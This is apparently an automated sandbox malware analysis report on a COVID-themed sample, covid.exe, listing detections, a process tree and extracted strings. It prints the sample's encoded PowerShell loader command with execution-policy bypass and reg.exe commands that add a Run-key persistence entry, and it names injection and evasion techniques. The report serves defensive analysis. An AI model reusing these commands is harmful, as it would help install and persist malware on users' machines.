Loading ...

Play interactive tourEdit tour

Analysis Report covid.exe

Overview

General Information

Sample Name:covid.exe
Analysis ID:379751
MD5:a990c03d14bef241e880d6167fa5a6aa
SHA1:210c7bed3182e3113b9a20816ced2f9c2ad6f86a
SHA256:9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Encoded PowerShell Command Line
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Yara detected Powershell Load Encrypted Assembly
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • covid.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: A990C03D14BEF241E880D6167FA5A6AA)
    • powershell.exe (PID: 5720 cmdline: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • iexplore.exe (PID: 4168 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/ MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 5956 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • reg.exe (PID: 6616 cmdline: 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 6644 cmdline: 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • buyonegetone.exe (PID: 6748 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
        • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mobsync.exe (PID: 6888 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
          • WerFault.exe (PID: 7016 cmdline: C:\Windows\system32\WerFault.exe -u -p 6888 -s 640 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 7120 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 6224 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
      • WerFault.exe (PID: 4464 cmdline: C:\Windows\system32\WerFault.exe -u -p 6224 -s 636 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 4244 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 5504 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
      • WerFault.exe (PID: 5108 cmdline: C:\Windows\system32\WerFault.exe -u -p 5504 -s 404 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 5172 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 5240 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x15e:$sa2: -encodedcommand
  • 0x13b:$sc2: -noprofile
  • 0x146:$se3: -executionpolicy bypass
  • 0x136:$sf1: -sta
C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txtJoeSecurity_PowershellLoadEncryptedAssemblyYara detected Powershell Load Encrypted AssemblyJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0x3fa3:$sa2: -encodedcommand
    • 0x3f80:$sc2: -noprofile
    • 0x3f8b:$se3: -executionpolicy bypass
    • 0x3f7b:$sf1: -sta

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
    Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A, CommandLine: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A,

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: covid.exeAvira: detected
    Multi AV Scanner detection for submitted fileShow sources
    Source: covid.exeVirustotal: Detection: 15%Perma Link
    Source: covid.exeReversingLabs: Detection: 34%
    Source: 0.0.covid.exe.c70000.0.unpackAvira: Label: TR/Dropper.Gen2
    Source: covid.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
    Source: unknownHTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2
    Source: covid.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605D1B8 FindFirstFileExW,13_2_00007FF68605D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11D1B8 FindFirstFileExW,18_2_00007FF6FE11D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW,29_2_00007FF7E3D7D1B8

    Networking:

    barindex
    Potential dropper URLs found in powershell memoryShow sources
    Source: powershell.exe, 00000001.00000002.281304560.000001A414536000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDatarame
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory:
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
    Source: Joe Sandbox ViewIP Address: 23.111.9.35 23.111.9.35
    Source: Joe Sandbox ViewIP Address: 23.111.9.35 23.111.9.35
    Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
    Source: base[1].js.7.drString found in binary or memory: "s.youtube.com"===t&&(t=OD(this.va)||"www.youtube.com")):t="video.google.com";this.Qj=t;PD(this,a,!0);this.L=new XC;g.H(this,this.L);t=b?b.innertubeApiKey:tD("",a.innertube_api_key);r=b?b.innertubeApiVersion:tD("",a.innertube_api_version);p=b?b.innertubeContextClientVersion:tD("",a.innertube_context_client_version);this.Mf={innertubeApiKey:uo("INNERTUBE_API_KEY")||t,innertubeApiVersion:uo("INNERTUBE_API_VERSION")||r,cH:g.M("INNERTUBE_CONTEXT_CLIENT_CONFIG_INFO"),dH:this.deviceParams.c,innertubeContextClientVersion:uo("INNERTUBE_CONTEXT_CLIENT_VERSION")|| equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: (g.Km(b,"www.youtube.com"),c=b.toString()):c=mw(c);b=new Dy(c);b.set("cmo=pf","1");d&&b.set("cmo=td","a1.googlevideo.com");return b}; equals www.youtube.com (Youtube)
    Source: FL794448.htm.7.drString found in binary or memory: <iframe width="560" height="315" src="https://www.youtube.com/embed/yEIPefMsf70" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen title="WHO: A global response to a global pandemic"></iframe> equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: Mga=function(a,b){if(!a.i["0"]){var c=new lB("0","fakesb",void 0,new hB(0,0,0,void 0,void 0,"auto"),null,null,1);a.i["0"]=b?new tA(new Dy("http://www.youtube.com/videoplayback"),c,"fake"):new dB(new Dy("http://www.youtube.com/videoplayback"),c,new aA(0,0),new aA(0,0),0,NaN)}}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.YD=function(a){a=OD(a.va);return"www.youtube-nocookie.com"===a?"www.youtube.com":a}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.k.clone=function(){var a=new Om;a.u=this.u;this.i&&(a.i=this.i.clone(),a.l=this.l);return a};var Vm="://secure-...imrworldwide.com/ ://cdn.imrworldwide.com/ ://aksecure.imrworldwide.com/ ://[^.]*.moatads.com ://youtube[0-9]+.moatpixel.com ://pm.adsafeprotected.com/youtube ://pm.test-adsafeprotected.com/youtube ://e[0-9]+.yt.srs.doubleverify.com www.google.com/pagead/xsul www.youtube.com/pagead/slav".split(" "),vda=/\bocr\b/;var wda=/(?:\[|%5B)([a-zA-Z0-9_]+)(?:\]|%5D)/g;var UD={f_:"LIVING_ROOM_APP_MODE_UNSPECIFIED",c_:"LIVING_ROOM_APP_MODE_MAIN",b_:"LIVING_ROOM_APP_MODE_KIDS",d_:"LIVING_ROOM_APP_MODE_MUSIC",e_:"LIVING_ROOM_APP_MODE_UNPLUGGED",a_:"LIVING_ROOM_APP_MODE_GAMING"};Ym.prototype.set=function(a,b){b=void 0===b?!0:b;0<=a&&52>a&&0===a%1&&this.i[a]!=b&&(this.i[a]=b,this.l=-1)}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.k.getVideoUrl=function(a,b,c,d,e){b={list:b};c&&(e?b.time_continue=c:b.t=c);c=g.ZD(this);d&&"www.youtube.com"===c?d="https://youtu.be/"+a:g.JD(this)?(d="https://"+c+"/fire",b.v=a):(d=this.protocol+"://"+c+"/watch",b.v=a,nq&&(a=Ap())&&(b.ebc=a));return g.Id(d,b)}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.oE=function(a){var b=g.ZD(a);!a.ea("yt_embeds_disable_new_error_lozenge_url")&&kha.includes(b)&&(b="www.youtube.com");return a.protocol+"://"+b}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.yM.prototype.l=function(a){var b=this;$na(this);var c=a.wA,d=this.api.T();"GENERIC_WITHOUT_LINK"!==c||d.I?"TOO_MANY_REQUESTS"===c?(d=this.api.getVideoData(),this.bd(BM(this,"TOO_MANY_REQUESTS_WITH_LINK",d.Vm(),void 0,void 0,void 0,!1))):"HTML5_NO_AVAILABLE_FORMATS_FALLBACK"!==c||d.I?this.bd(g.zM(a.errorMessage)):this.bd(BM(this,"HTML5_NO_AVAILABLE_FORMATS_FALLBACK_WITH_LINK_SHORT","//www.youtube.com/supported_browsers")):(a=d.hostLanguage,c="//support.google.com/youtube/?p=player_error1",a&&(c= equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: gia(this.videoData),this.V("highrepfallback");else if(a.i){b=this.l?this.l.l.l:null;if(Rva(a)&&b&&b.isLocked())var d="FORMAT_UNAVAILABLE";else if(!this.i.I&&"auth"===a.errorCode&&"429"===a.details.rc){d="TOO_MANY_REQUESTS";var e="6"}this.V("playererror",a.errorCode,d,g.KB(a.details),e)}else d=/^pp/.test(this.videoData.clientPlaybackNonce),oU(this,a.errorCode,a.details),d&&"manifest.net.connect"===a.errorCode&&(a="https://www.youtube.com/generate_204?cpn="+this.videoData.clientPlaybackNonce+"&t="+ equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: h,l,"Trusted Ad Domain URL");this.Da=U(!1,a.privembed);this.protocol=0===this.Gc.indexOf("http:")?"http":"https";this.va=hw((b?b.customBaseYoutubeUrl:a.BASE_YT_URL)||"")||hw(this.Gc)||this.protocol+"://www.youtube.com/";l=b?b.eventLabel:a.el;h="detailpage";"adunit"===l?h=this.l?"embedded":"detailpage":"embedded"===l||this.u?h=rD(h,l,hha):l&&(h="embedded");this.Ca=h;xp();l=null;h=b?b.playerStyle:a.ps;var m=g.fb(xD,h);!h||m&&!this.u||(l=h);this.playerStyle=l;this.J=(this.I=g.fb(xD,this.playerStyle))&& equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: oJ.prototype.replace=function(a,b){a=g.q(a);for(var c=a.next();!c.done;c=a.next())delete this.i[c.value.encryptedTokenJarContents];kka(this,b)};pJ.prototype.Zo=function(a){var b,c,d=null===(b=a.responseContext)||void 0===b?void 0:b.locationPlayabilityToken;void 0!==d&&(this.locationPlayabilityToken=d,this.i=void 0,"TVHTML5"===(null===(c=a.responseContext)||void 0===c?void 0:c.clientName)?(this.localStorage=lka(this))&&this.localStorage.set("yt-location-playability-token",d,15552E3):g.Sq("YT_CL",JSON.stringify({t6:d}),15552E3,void 0,!0))};var sJ;g.v(rJ,Mr);rJ.prototype.ow=function(a,b){a=Mr.prototype.ow.call(this,a,b);return Object.assign(Object.assign({},a),this.i)};var Bka=/[&\?]action_proxy=1/,Aka=/[&\?]token=([\w-]*)/,Cka=/[&\?]video_id=([\w-]*)/,Dka=/[&\?]index=([\d-]*)/,Eka=/[&\?]m_pos_ms=([\d-]*)/,Hka=/[&\?]vvt=([\w-]*)/,vka="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),Fka="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),xka={android:"ANDROID", equals www.youtube.com (Youtube)
    Source: unknownDNS traffic detected: queries for: www.who.int
    Source: mobsync.exe, mobsync.exe, 00000014.00000002.340204624.0000023F81490000.00000040.00000001.sdmpString found in binary or memory: http://code.jquery.com/
    Source: powershell.exe, 00000001.00000002.292130964.000001A42AF59000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: fa-regular-400[1].eot.7.drString found in binary or memory: http://fontello.com
    Source: fa-regular-400[1].eot.7.drString found in binary or memory: http://fontello.comFont
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: FL794448.htm.7.drString found in binary or memory: http://schema.org
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000001.00000002.265257231.000001A412EE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: msapplication.xml.6.drString found in binary or memory: http://www.amazon.com/
    Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: FL794448.htm.7.drString found in binary or memory: http://www.emro.who.int/index.html
    Source: FL794448.htm.7.drString found in binary or memory: http://www.euro.who.int/en/home
    Source: msapplication.xml2.6.drString found in binary or memory: http://www.live.com/
    Source: msapplication.xml6.6.drString found in binary or memory: http://www.wikipedia.com/
    Source: base[1].js.7.drString found in binary or memory: http://www.youtube.com/videoplayback
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/drm/2012/10/10
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/streaming/metadata/segment/102015
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/streaming/otf/durations/112015
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/yt/2012/10/10
    Source: base[1].js.7.drString found in binary or memory: https://admin.youtube.com
    Source: analytics[1].js.7.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
    Source: FL794448.htm.7.drString found in binary or memory: https://app.powerbi.com/
    Source: FL794448.htm.7.drString found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_covid-map.tmb-479v.jpg
    Source: FL794448.htm.7.drString found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_interactive-timeline.tmb-479v.pn
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
    Source: FL794448.htm.7.drString found in binary or memory: https://covid19.who.int/
    Source: base[1].js.7.drString found in binary or memory: https://docs.google.com/get_video_info
